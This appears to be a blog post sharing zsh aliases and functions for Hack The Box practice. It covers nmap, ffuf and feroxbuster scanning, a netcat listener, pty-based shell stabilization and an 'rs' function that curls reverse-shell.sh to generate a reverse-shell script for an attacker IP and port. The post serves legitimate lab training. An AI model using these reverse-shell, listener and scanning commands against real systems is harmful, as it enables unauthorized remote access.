- To easily list files giving more information -
ll
alias ll='ls -alhF'
- First, install
xclip
in your system. This will let you copy output of a command directly to your clipboard. -cat file.txt|c
alias c='xclip -selection clipboard'
- Change the prompt of your shell. Helps you to keep classify and recognize your terminal windows effectively. You can change colors according to your preference -
p dev01>
p() {
PS1="%B%F{green}➜ %B%F{#03fcd0}% $1 %{$reset_color%}"
}
- Startup python SimpleHTTPServer -
server 8081
. Here if you want to start the server in a specific directory, you can pass the dir as an argument -server 9090 /tmp/
server() {
if [[ $2 ]];then
python3 -m http.server $1 --directory $2
else
python3 -m http.server $1
fi
}
- Generate a script with reverse shells to use. -
rs 10.10.14.28 9001 > shell.sh
rs() {
curl https://reverse-shell.sh/$1:$2
}
- Connect to a VPN -
vpn-up
vpn-up() {
sudo pkill openvpn
sudo openvpn /home/kavi/Documents/HTB/lab_kavigihan.ovpn
}
- Setup the env. (For HTB players). This will make a directory named after a name you specify and start a webserver
in
/opt/drop
directory. You can put yourpspy
,linpeas.sh
like files there. PID of the server is saved in/home/kavi/Documents/HTB/$1/.server.pid
incase you want to kill the server -htb-init Moderators
htb-init() {
if [[ $1 ]]; then
mkdir -p /home/kavi/Documents/HTB/$1/files
mkdir -p /home/kavi/Documents/HTB/$1/exploits
cd /opt/drop
/usr/bin/python3 -m http.server 8080 > /dev/null 2>&1 &
echo $! > /home/kavi/Documents/HTB/$1/.server.pid
cd /home/kavi/Documents/HTB/$1
clear
else
echo 'Usage: htb-init Moderators'
fi
}
- Doing a full nmap.
nmap-full 10.10.11.169
nmap-full() {
nmap -p- -sC -sV -A --min-rate=400 --min-parallelism=512 -vv $1
}
- Run
ffuf
for direcotry busting -ffuf-dir http://site.com/FUZZ
. If you want to specify extensions of any other option you can pass them after the URL (ffuf-dir URL -e php -fl 100
)
ffuf-dir() {
ffuf -u $1 -w /usr/share/wordlists/dirb/big.txt ${@: 2};
}
- Run
ffuf
for vhost fuzzing -ffuf-vhost domain.local
ffuf-vhost() {
ffuf -H "Host: FUZZ.$1" -u http://$1 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt ${@: 2};
}
- Start feroxbuster for directory brutforcing -
fx http://10.10.11.169
${@: 2};
fx() {
feroxbuster -u $1 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
}
- Start a listener. This is specially for zsh users(specially
oh-my-zsh
).By default this will start the listener in port 9090, or you could speficy the port you need.lst 9001
lst() {
if [[ $1 ]]; then
bash --login -c "nc -lvnp $1"
else
bash --login -c "nc -lvnp 9090"
fi
}
- Stabilize the shell. This can be used in combination with the above listener.
st() {
if [[ $1 -eq 1 ]]; then
printf "python -c 'import pty;pty.spawn(\"/bin/bash\")'\nexport TERM=alacritty\n"|c
elif [[ $1 -eq 2 ]]; then
printf "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'\nexport TERM=alacritty\n"|c
else
printf 'script -q /dev/null -c /bin/bash\nexport TERM=alacritty\n'|c
fi
echo "Stablizing commands copied to the clipboard!"
stty raw -echo;fg
}
I.e once you get a conntection to your listener, you can background it with Ctrl+z
and then issue st
to copy the stabilizing commands to your clipboard (Here c
alias mentioned above is also used). Then this will isse the stty raw -echo;fg
command for you. Then you just have to paste the copied commands and press enter. And now you have a fully stabalized shell!
Another nice automated solution for stabilizing your reverse shell which works for both bash
and zsh
can be found here
- Url encode a string -
echo asd==|urlencode
urlencode() {
python3 -c "import sys; from urllib.parse import quote; print(quote(sys.stdin.read().strip()));"
}
- URL decode a string -
echo 123%3D%3D|urldecode
urldecode() {
python3 -c "import sys; from urllib.parse import unquote; print(unquote(sys.stdin.read().strip()));"
}
- Get the MD5 hash of a string -
echo kavi|md5
md5() {
python3 -c 'import hashlib,sys; print(hashlib.md5(sys.stdin.read().encode()).hexdigest())'
}
- Followings are for tmux users. This will allow you to quickly add notes to the status bar of your tmux session. I.e when you find a user password which you will be using a lot, you can add it here, instead of keeping that in the clipboard or noting it down in a file. -
tsa 'admin:pa$$10rd'
- this will add the note.tsd
- will clear the status bar
tsa() {
status_bar=$(cat $TMUX_SATUS_BAR)
tmux set-option -g status-right "$1 $status_bar"
echo "| $1 $status_bar" > $TMUX_SATUS_BAR
}
tsd() {
echo '[#{session_name}]' > $TMUX_SATUS_BAR
status_bar=$(cat $TMUX_SATUS_BAR)
tmux set-option -g status-right "$status_bar"
}
NOTE: For this to work you need to have a variable called TMUX_SATUS_BAR
pointing to a file which contains the current config for your the right sude if your status bar. For me its [#{session_name}]
. For more information, take a look at my .zshrc
If you have any other suggestions, let me know!